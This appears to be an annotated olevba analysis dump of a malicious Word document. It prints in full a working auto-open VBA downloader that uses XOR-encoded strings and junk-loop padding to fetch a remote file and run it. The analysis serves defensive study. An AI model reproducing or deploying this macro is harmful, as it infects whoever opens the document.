dynamoo

Malicious Word macro

Feb 24th, 2015
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- irn001~1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: irn001~1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: irn001~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Auto-exec entry point: Word runs autoopen when the document is opened (the report's
  ' AutoExec/AutoOpen finding for this stream). Its only statement calls N1, which is
  ' defined in Module11 of this same dump, so the document's behaviour starts here.
  14. Sub autoopen()
  15. N1
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Class1.cls
  26. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  29. Private Function UmYcCcn()
  30.  
  31. End Function
  32. Private Sub TpNGCNftO()
  33.  
  34. End Sub
  35. Public Sub fHJqKPY()
  36.  
  37. End Sub
  38. Public Sub CBGdkrVjiyB()
  39.  
  40. End Sub
  41. Public Sub kdMvxRuzMJsFffG()
  42.  
  43. End Sub
  44. Public Function QCbsSsDxPzV()
  45.  
  46. End Function
  47. Public Sub SevJRSdAvZaGNgo()
  48.  
  49. End Sub
  50. Public Function FDIuAHZzyOE()
  51.  
  52. End Function
  53. Private Function EjhOD()
  54.  
  55. End Function
  56. Public Sub SdLLyyajvQr()
  57.  
  58. End Sub
  59. Private Function YMJDVSqakqmyO()
  60.  
  61. End Function
  62. Private Function wTBeubh()
  63.  
  64. End Function
  65. Private Function dZZYdNGNsS()
  66.  
  67. End Function
  68. Public Function bSrUzjfTofUjtcc()
  69.  
  70. End Function
  71. Private Function zLaHZ()
  72.  
  73. End Function
  74. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  75. ANALYSIS:
  76. No suspicious keyword or IOC found.
  77. -------------------------------------------------------------------------------
  78. VBA MACRO Class2.cls
  79. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class2'
  80. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  81.  
  82. Private Sub DMQRvKdxQKA()
  83.  
  84. End Sub
  85. Public Sub oteQeIVU()
  86.  
  87. End Sub
  88. Private Sub jHQPzikE()
  89.  
  90. End Sub
  91. Private Function JfsgRtPOqY()
  92.  
  93. End Function
  94. Private Sub FfrlDA()
  95.  
  96. End Sub
  97. Public Function JFQixSFPniLNtN()
  98.  
  99. End Function
  100. Private Sub wFGEJhnuZmlBEH()
  101.  
  102. End Sub
  103. Public Sub gQyAUxCP()
  104.  
  105. End Sub
  106. Private Sub iiJRfGbFevVw()
  107.  
  108. End Sub
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. ANALYSIS:
  111. No suspicious keyword or IOC found.
  112. -------------------------------------------------------------------------------
  113. VBA MACRO Class3.cls
  114. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class3'
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116.  
  117. Public Function lLQQjgCYxplw()
  118.  
  119. End Function
  120. Public Sub mvSNrtatzH()
  121.  
  122. End Sub
  123. Private Function mkpMSaE()
  124.  
  125. End Function
  126. Private Sub lnfETL()
  127.  
  128. End Sub
  129. Private Function Adivsb()
  130.  
  131. End Function
  132. Public Function pyKmGlJcBcnhz()
  133.  
  134. End Function
  135. Public Sub zFBNetAC()
  136.  
  137. End Sub
  138. Public Sub HJqwP()
  139.  
  140. End Sub
  141. Public Function oonsdjrHi()
  142.  
  143. End Function
  144. Private Sub qiGkOMu()
  145.  
  146. End Sub
  147. Private Function kyIrrefFO()
  148.  
  149. End Function
  150. Public Function BasEspjByVFPVRe()
  151.  
  152. End Function
  153. Public Function SczhKaGMgodJEE()
  154.  
  155. End Function
  156. Public Sub mtYykADGy()
  157.  
  158. End Sub
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. No suspicious keyword or IOC found.
  162. -------------------------------------------------------------------------------
  163. VBA MACRO Class4.cls
  164. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class4'
  165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  166.  
  167. Private Sub eJEFDIuAZzyOEHyYAgeL()
  168.  
  169. End Sub
  170. Private Sub BPaIIvvQfsTorIUJGASPmVhnju()
  171.  
  172. End Sub
  173. Private Function ktQxbrexFuaVVTZKDKpPB()
  174.  
  175. End Function
  176. Private Sub PoRwgcQlbRgqZZL()
  177.  
  178. End Sub
  179. Private Function IQEVHLlaQ()
  180.  
  181. End Function
  182. Private Sub DZxDzL()
  183.  
  184. End Sub
  185. Private Sub AJTNrHauNH()
  186.  
  187. End Sub
  188. Private Function mlqbTbF()
  189.  
  190. End Function
  191. Public Function logETM()
  192.  
  193. End Function
  194. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  195. ANALYSIS:
  196. No suspicious keyword or IOC found.
  197. -------------------------------------------------------------------------------
  198. VBA MACRO Class5.cls
  199. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class5'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201.  
  202. Private Function cBcnhziFpzFB()
  203.  
  204. End Function
  205. Public Function ACLjeHJqw()
  206.  
  207. End Function
  208. Public Function soonsdjrHihxn()
  209.  
  210. End Function
  211. Private Sub kOMujDtkyIrr()
  212.  
  213. End Sub
  214. Public Function ObDQBasEspj()
  215.  
  216. End Function
  217. Public Sub FPVReuvQSczhKaG()
  218.  
  219. End Sub
  220. Private Sub dJEEDItm()
  221.  
  222. End Sub
  223. Public Sub kADGyQAfOK()
  224.  
  225. End Sub
  226. Public Function BOZHHvhIfrFn()
  227.  
  228. End Function
  229. Public Sub UIFzRPmHg()
  230.  
  231. End Sub
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233. ANALYSIS:
  234. No suspicious keyword or IOC found.
  235. -------------------------------------------------------------------------------
  236. VBA MACRO Class6.cls
  237. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class6'
  238. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  239.  
  240. Private Sub QQjgD()
  241.  
  242. End Sub
  243. Public Function zLOdyAJTNrH()
  244.  
  245. End Function
  246. Public Function HxdmmlqbTbFSR()
  247.  
  248. End Function
  249. Public Sub gETMwehB()
  250.  
  251. End Sub
  252. Public Function GcpcOqMKn()
  253.  
  254. End Function
  255. Public Sub cCcnhzwTpNGCNft()
  256.  
  257. End Sub
  258. Public Sub kfHJqKPYNtCCB()
  259.  
  260. End Sub
  261. Public Function rVjiyBEUkdMvxRuz()
  262.  
  263. End Function
  264. Private Function FffGOcDQ()
  265.  
  266. End Function
  267. Private Sub SsDxPzVFQ()
  268.  
  269. End Sub
  270. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  271. ANALYSIS:
  272. No suspicious keyword or IOC found.
  273. -------------------------------------------------------------------------------
  274. VBA MACRO Module1.bas
  275. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module1'
  276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  277. Public Function rUkQQqyoTOPN()
  278.  
  279. End Function
  280. Public Sub EiJuKOQIi()
  281.  
  282. End Sub
  283. Public Sub VJeUL()
  284.  
  285. End Sub
  286. Public Sub RFsSpBQxOBFfSQ()
  287.  
  288. End Sub
  289. Private Function wSrxt()
  290.  
  291. End Function
  292. Private Function stDMHlAToGBqQfg()
  293.  
  294. End Function
  295. Private Function NUyLKbfiZyNFqY()
  296.  
  297. End Function
  298. Private Sub cqAUjVIjFEhNgRV()
  299.  
  300. End Sub
  301. Private Sub btqMjH()
  302.  
  303. End Sub
  304. Private Sub YnIwFdYBDkEJ()
  305.  
  306. End Sub
  307. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  308. ANALYSIS:
  309. No suspicious keyword or IOC found.
  310. -------------------------------------------------------------------------------
  311. VBA MACRO Module2.bas
  312. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module2'
  313. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  314. Private Function BQxOBFfS()
  315.  
  316. End Function
  317. Private Function awSrx()
  318.  
  319. End Function
  320. Public Function QstDMHlAToGB()
  321.  
  322. End Function
  323. Public Sub gejTNU()
  324.  
  325. End Sub
  326. Public Function bfiZyNFqYavYqAUjV()
  327.  
  328. End Function
  329. Private Function EhNgRVvVhbt()
  330.  
  331. End Function
  332. Public Function HzvHYnI()
  333.  
  334. End Function
  335. Public Function YBDkE()
  336.  
  337. End Function
  338. Public Function nvwuzQelPccr()
  339.  
  340. End Function
  341. Public Function OeQGorLo()
  342.  
  343. End Function
  344. Private Function mzZZAIUxQwT()
  345.  
  346. End Function
  347. Public Function xrJtPzK()
  348.  
  349. End Function
  350. Public Sub pDLMVuoRTAGaiYD()
  351.  
  352. End Sub
  353. Private Sub CnuBRssHyA()
  354.  
  355. End Sub
  356. Private Function ZQEtNEvIT()
  357.  
  358. End Function
  359. Private Function pQZlNhMk()
  360.  
  361. End Function
  362. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  363. ANALYSIS:
  364. No suspicious keyword or IOC found.
  365. -------------------------------------------------------------------------------
  366. VBA MACRO Module3.bas
  367. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module3'
  368. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  369. Private Sub OcDQCbsSsDx()
  370.  
  371. End Sub
  372. Private Sub FQQSevJRSdAvZaG()
  373.  
  374. End Sub
  375. Private Function eJEFDIuA()
  376.  
  377. End Function
  378. Private Sub yOEHyYAgeL()
  379.  
  380. End Sub
  381. Private Function BPaIIvvQfsTo()
  382.  
  383. End Function
  384. Private Sub UJGASPmVhnju()
  385.  
  386. End Sub
  387. Public Function ktQxbr()
  388.  
  389. End Function
  390. Private Sub FuaVVTZKD()
  391.  
  392. End Sub
  393. Public Sub BQUYPoRwgcQlb()
  394.  
  395. End Sub
  396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  397. ANALYSIS:
  398. No suspicious keyword or IOC found.
  399. -------------------------------------------------------------------------------
  400. VBA MACRO Module4.bas
  401. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module4'
  402. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  403. Private Function frFnEquUIFzR()
  404.  
  405. End Function
  406. Public Function gmiuxLijsCxb()
  407.  
  408. End Function
  409. Public Function wqgLU()
  410.  
  411. End Function
  412. Public Function JCJoBAQTQOoCvgN()
  413.  
  414. End Function
  415. Private Sub RfpKYLxZvuVDU()
  416.  
  417. End Sub
  418. Public Sub LQQjgCY()
  419.  
  420. End Sub
  421. Private Function wNdymvS()
  422.  
  423. End Function
  424. Public Sub atzHwclmk()
  425.  
  426. End Sub
  427. Private Sub aERQhlnfETLweg()
  428.  
  429. End Sub
  430. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  431. ANALYSIS:
  432. No suspicious keyword or IOC found.
  433. -------------------------------------------------------------------------------
  434. VBA MACRO Module5.bas
  435. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module5'
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. (empty macro)
  438. -------------------------------------------------------------------------------
  439. VBA MACRO Module6.bas
  440. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module6'
  441. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  442. Public Function bfiZyNFqYavY()
  443.  
  444. End Function
  445. Public Function UjVIjFEhNg()
  446.  
  447. End Function
  448. Public Sub VhbtqMjHz()
  449.  
  450. End Sub
  451. Public Function nIwFdYBDkEJRHnv()
  452.  
  453. End Function
  454. Public Sub QelPccrvyp()
  455.  
  456. End Sub
  457. Public Sub GorLosGCmzZZAIU()
  458.  
  459. End Sub
  460. Private Function TmLmxrJtP()
  461.  
  462. End Function
  463. Private Sub LYpDLMVuoRTAGa()
  464.  
  465. End Sub
  466. Private Sub yzxCnuBRssH()
  467.  
  468. End Sub
  469. Public Sub RuZQEtNEv()
  470.  
  471. End Sub
  472. Public Sub BppQZlNhMkC()
  473.  
  474. End Sub
  475. Private Function uMJgPbgdoF()
  476.  
  477. End Function
  478. Private Function mKrUk()
  479.  
  480. End Function
  481. Private Sub yoTOPNSD()
  482.  
  483. End Sub
  484. Private Sub JuKOQI()
  485.  
  486. End Sub
  487. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  488. ANALYSIS:
  489. No suspicious keyword or IOC found.
  490. -------------------------------------------------------------------------------
  491. VBA MACRO Module7.bas
  492. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module7'
  493. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  494. Public Sub OeQGorLoGCmzZZAIU()
  495.  
  496. End Sub
  497. Public Sub TmLmxrJtPKPLYpDLMVu()
  498.  
  499. End Sub
  500. Private Sub AGaiYDyzxCnuBR()
  501.  
  502. End Sub
  503. Public Sub yAsRuZQEtNEv()
  504.  
  505. End Sub
  506. Public Function BppQZlNhMkCCAuMJgPbgdoFG()
  507.  
  508. End Function
  509. Private Sub KrUkQQq()
  510.  
  511. End Sub
  512. Private Sub OPNSDwEiJuKOQI()
  513.  
  514. End Sub
  515. Public Function aVJeULak()
  516.  
  517. End Function
  518. Private Function sSpBQxOBFfS()
  519.  
  520. End Function
  521. Private Function awSrxEHQstDMHl()
  522.  
  523. End Function
  524. Public Function GBqQfgej()
  525.  
  526. End Function
  527. Private Sub yLKbfiZyNFqYav()
  528.  
  529. End Sub
  530. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  531. ANALYSIS:
  532. No suspicious keyword or IOC found.
  533. -------------------------------------------------------------------------------
  534. VBA MACRO Module8.bas
  535. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module8'
  536. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  537. Public Sub hxnqiG()
  538.  
  539. End Sub
  540. Private Function ujDtkyIrrefFO()
  541.  
  542. End Function
  543. Public Sub BasEspjByVFPVRevQSczhKaG()
  544.  
  545. End Sub
  546. Private Function dJEEDItmYykADGyQA()
  547.  
  548. End Function
  549. Private Function zTKBOZHHvhIf()
  550.  
  551. End Function
  552. Public Function EquUIFz()
  553.  
  554. End Function
  555. Private Sub HgmiuxL()
  556.  
  557. End Sub
  558. Private Function CxbqIdwqg()
  559.  
  560. End Function
  561. Public Function TZJCJoBAQTQOoCv()
  562.  
  563. End Function
  564. Public Function kMRfpKYLxZvuV()
  565.  
  566. End Function
  567. Public Sub KlLQQjgCYxpl()
  568.  
  569. End Sub
  570. Private Function ymvSN()
  571.  
  572. End Function
  573. Public Sub KPYNtCCB()
  574.  
  575. End Sub
  576. Private Function rVjiyBE()
  577.  
  578. End Function
  579. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  580. ANALYSIS:
  581. No suspicious keyword or IOC found.
  582. -------------------------------------------------------------------------------
  583. VBA MACRO Module9.bas
  584. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module9'
  585. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  586. Public Sub UVTZJCJoBAQTQ()
  587.  
  588. End Sub
  589. Private Sub vgNPkMRfpKY()
  590.  
  591. End Sub
  592. Public Sub vuVDUGKlLQQjgCY()
  593.  
  594. End Sub
  595. Private Sub wNdymvSrtatzHwclmkpM()
  596.  
  597. End Sub
  598. Private Sub RQhlnfETLwe()
  599.  
  600. End Sub
  601. Public Sub ivsbo()
  602.  
  603. End Sub
  604. Public Sub yKmGlJcB()
  605.  
  606. End Sub
  607. Private Function ziFpzF()
  608.  
  609. End Function
  610. Private Function tACLje()
  611.  
  612. End Function
  613. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  614. ANALYSIS:
  615. No suspicious keyword or IOC found.
  616. -------------------------------------------------------------------------------
  617. VBA MACRO Module10.bas
  618. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module10'
  619. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  620. (empty macro)
  621. -------------------------------------------------------------------------------
  622. VBA MACRO Module11.bas
  623. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module11'
  624. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Binds the local name GHGijkHKJG to URLDownloadToFileA in urlmon (see the Alias clause).
  ' The #If VBA7 branch is the PtrSafe/LongPtr declaration, the #Else branch the legacy
  ' Long one. The parameter names are meaningless; by the API's argument order they are
  ' (pCaller, URL, destination file name, reserved, status callback).
  ' NOTE(review): the import is renamed, but the real API name is still a plain literal in
  ' the Alias clause; presumably that literal is what the report's URLDownloadToFileA and
  ' Lib findings for this module key on.
  625. #If VBA7 Then
  626.     Private Declare PtrSafe Function GHGijkHKJG Lib "urlmon" Alias _
  627.     "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
  628.     ByVal sdfsdf As String, _
  629.     ByVal jdfgdfg As String, _
  630.     ByVal tjrtgefsdf As Long, _
  631.     ByVal khlkdfsef As LongPtr) As LongPtr
  632. #Else
  633.     Private Declare Function GHGijkHKJG Lib "urlmon" Alias _
  634.     "URLDownloadToFileA" (ByVal pCaller As Long, _
  635.     ByVal sdfsdf As String, _
  636.     ByVal jdfgdfg As String, _
  637.     ByVal tjrtgefsdf As Long, _
  638.     ByVal khlkdfsef As Long) As Long
  639. #End If
  640.  
  641.  
  ' Called from autoopen in ThisDocument. The only effective statement is the tiO call:
  ' the first argument is a literal decoded by XorByDataLen; the second is
  ' Environ(<decoded name>) & <decoded suffix>, i.e. a path built from an environment
  ' variable. tiO passes the first to the URLDownloadToFileA alias as the URL and the
  ' second as the destination file, then runs that file with Shell.
  ' All three literals are stored XORed with 255, so no URL or path appears in clear text
  ' in this stream; the per-module "no IOC" result should be read with that in mind.
  ' NOTE(review): the literals as rendered on this page may have lost non-printable bytes;
  ' decode from the original OLE stream rather than from this listing.
  642. Sub N1()
  643. tiO XorByDataLen("—‹‹ÅÐЗš–”š—ž““Ñ›šÐ•ŒÐ–‘Ñš‡š"), Environ(XorByDataLen("«²¯")) & XorByDataLen("£¸·•”›™˜Ñš‡š")
  ' Junk padding: each "For v = 0 To 0 / If v = 5 Then End" loop runs once with v = 0,
  ' so the End is never reached. The same filler recurs throughout this module.
  644. Dim ZjplxNd As Integer
  645. For ZjplxNd = 0 To 0
  646. If ZjplxNd = 5 Then End
  647. Next ZjplxNd
  648. Dim bpQoaeEsqkC As Integer
  649. For bpQoaeEsqkC = 0 To 0
  650. If bpQoaeEsqkC = 5 Then End
  651. Next bpQoaeEsqkC
  652. End Sub
  ' Download-and-execute helper. f243r14Z is passed as the URL and x9 as the local file
  ' name to GHGijkHKJG (the URLDownloadToFileA alias declared in this module); x9 is then
  ' launched with Shell(x9, 1), where 1 is vbNormalFocus.
  ' The download result (vJHKBJdfkgfg) is never checked and the function never assigns its
  ' Boolean return value, so Shell is attempted whether or not the download succeeded.
  ' Every other statement in the body is the unreachable-End filler loop
  ' (For v = 0 To 0 / If v = 5 Then End).
  ' Behaviour a defender can look for: the Office process fetching a file over the network,
  ' writing it to the path in x9, and then starting it as a child process.
  653. Function tiO(f243r14Z As String, x9 As String) As Boolean
  ' Effective statement 1 of 2: fetch f243r14Z to the file x9.
  654. vJHKBJdfkgfg = GHGijkHKJG(0&, f243r14Z, x9, 0&, 0&)
  655. Dim erSnRqHiITNg As Integer
  656. For erSnRqHiITNg = 0 To 0
  657. If erSnRqHiITNg = 5 Then End
  658. Next erSnRqHiITNg
  659. Dim oocNpLYmT As Integer
  660. For oocNpLYmT = 0 To 0
  661. If oocNpLYmT = 5 Then End
  662. Next oocNpLYmT
  663. Dim OwZLs2
  664. Dim KMhJO As Integer
  665. For KMhJO = 0 To 0
  666. If KMhJO = 5 Then End
  667. Next KMhJO
  668. Dim LYmTlQb As Integer
  669. For LYmTlQb = 0 To 0
  670. If LYmTlQb = 5 Then End
  671. Next LYmTlQb
  ' Effective statement 2 of 2: run the downloaded file; the returned task id is unused.
  672. OwZLs2 = Shell(x9, 1)
  673. Dim OcZHUuuVer As Integer
  674. For OcZHUuuVer = 0 To 0
  675. If OcZHUuuVer = 5 Then End
  676. Next OcZHUuuVer
  677. Dim ocNpLYm As Integer
  678. For ocNpLYm = 0 To 0
  679. If ocNpLYm = 5 Then End
  680. Next ocNpLYm
  681. End Function
  682.  
  ' String decoder used by N1. Converts sData to a byte array (StrConv vbFromUnicode),
  ' XORs every byte with 255 (0xFF), converts back (StrConv vbUnicode) and returns the
  ' result. An empty sData skips the If block, so the return value stays an empty String.
  ' Despite the name, the key is the constant 255; the data length is only the loop bound.
  ' XOR with a fixed byte is its own inverse, so applying the same operation to the
  ' literals in N1 recovers their plaintext. This encoding is presumably why the report
  ' flags keywords (S) for this file but leaves the IOC (I) flag unset.
  ' All Dim/For/If/Next groups of the form "For v = 0 To 0 / If v = 5 Then End" are
  ' filler: the loop runs once with v = 0 and End is never reached.
  683. Public Function XorByDataLen(sData As String) As String
  684. Dim bData() As Byte
  685. Dim ZvfqvsD As Integer
  686. For ZvfqvsD = 0 To 0
  687. If ZvfqvsD = 5 Then End
  688. Next ZvfqvsD
  689. Dim pKArFPyyl As Integer
  690. For pKArFPyyl = 0 To 0
  691. If pKArFPyyl = 5 Then End
  692. Next pKArFPyyl
  693. Dim i As Integer
  694. Dim QvHHQbeVuJ As Integer
  695. For QvHHQbeVuJ = 0 To 0
  696. If QvHHQbeVuJ = 5 Then End
  697. Next QvHHQbeVuJ
  698. Dim Npaquw As Integer
  699. For Npaquw = 0 To 0
  700. If Npaquw = 5 Then End
  701. Next Npaquw
  702. If Len(sData) <> 0 Then
  703. Dim xnSccaf As Integer
  704. For xnSccaf = 0 To 0
  705. If xnSccaf = 5 Then End
  706. Next xnSccaf
  707. Dim RCxmGxo As Integer
  708. For RCxmGxo = 0 To 0
  709. If RCxmGxo = 5 Then End
  710. Next RCxmGxo
  ' This sizing has no lasting effect: bData is reassigned from StrConv below.
  711. ReDim bData(Len(sData))
  712. Dim NrEDTYbRrG As Integer
  713. For NrEDTYbRrG = 0 To 0
  714. If NrEDTYbRrG = 5 Then End
  715. Next NrEDTYbRrG
  716. Dim bQwrsqvgZgKl As Integer
  717. For bQwrsqvgZgKl = 0 To 0
  718. If bQwrsqvgZgKl = 5 Then End
  719. Next bQwrsqvgZgKl
  ' Effective step 1: string -> bytes in the system code page.
  720. bData = StrConv(sData, vbFromUnicode)
  721. Dim yYyJDVSp As Integer
  722. For yYyJDVSp = 0 To 0
  723. If yYyJDVSp = 5 Then End
  724. Next yYyJDVSp
  725. Dim dUuQB As Integer
  726. For dUuQB = 0 To 0
  727. If dUuQB = 5 Then End
  728. Next dUuQB
  729. For i = 0 To Len(sData) - 1
  730. Dim NdwPje As Integer
  731. For NdwPje = 0 To 0
  732. If NdwPje = 5 Then End
  733. Next NdwPje
  734. Dim qyzJh As Integer
  735. For qyzJh = 0 To 0
  736. If qyzJh = 5 Then End
  737. Next qyzJh
  ' Effective step 2: flip every bit of the byte (single-byte XOR key 0xFF).
  738. bData(i) = bData(i) Xor 255
  739. Dim xPMkFekgs As Integer
  740. For xPMkFekgs = 0 To 0
  741. If xPMkFekgs = 5 Then End
  742. Next xPMkFekgs
  743. Dim CmxDzK As Integer
  744. For CmxDzK = 0 To 0
  745. If CmxDzK = 5 Then End
  746. Next CmxDzK
  747. Next i
  748. Dim sfGcpDlCo As Integer
  749. For sfGcpDlCo = 0 To 0
  750. If sfGcpDlCo = 5 Then End
  751. Next sfGcpDlCo
  752. Dim dzjuzwHZ As Integer
  753. For dzjuzwHZ = 0 To 0
  754. If dzjuzwHZ = 5 Then End
  755. Next dzjuzwHZ
  ' Effective step 3: bytes -> string; this is the function's return value.
  756. XorByDataLen = StrConv(bData, vbUnicode)
  757. Dim pcCZmAhzl As Integer
  758. For pcCZmAhzl = 0 To 0
  759. If pcCZmAhzl = 5 Then End
  760. Next pcCZmAhzl
  761. Dim yNGqY As Integer
  762. For yNGqY = 0 To 0
  763. If yNGqY = 5 Then End
  764. Next yNGqY
  765. End If
  766. Dim TCCpcCZmAh As Integer
  767. For TCCpcCZmAh = 0 To 0
  768. If TCCpcCZmAh = 5 Then End
  769. Next TCCpcCZmAh
  770. Dim vYcqn As Integer
  771. For vYcqn = 0 To 0
  772. If vYcqn = 5 Then End
  773. Next vYcqn
  774. End Function
  775.  
  776.  
  777. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  778. ANALYSIS:
  779. +------------+--------------------+-----------------------------------------+
  780. | Type       | Keyword            | Description                             |
  781. +------------+--------------------+-----------------------------------------+
  782. | Suspicious | Lib                | May run code from a DLL                 |
  783. | Suspicious | Shell              | May run an executable file or a system  |
  784. |            |                    | command                                 |
  785. | Suspicious | Environ            | May read system environment variables   |
  786. | Suspicious | Xor                | May attempt to obfuscate specific       |
  787. |            |                    | strings                                 |
  788. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  789. +------------+--------------------+-----------------------------------------+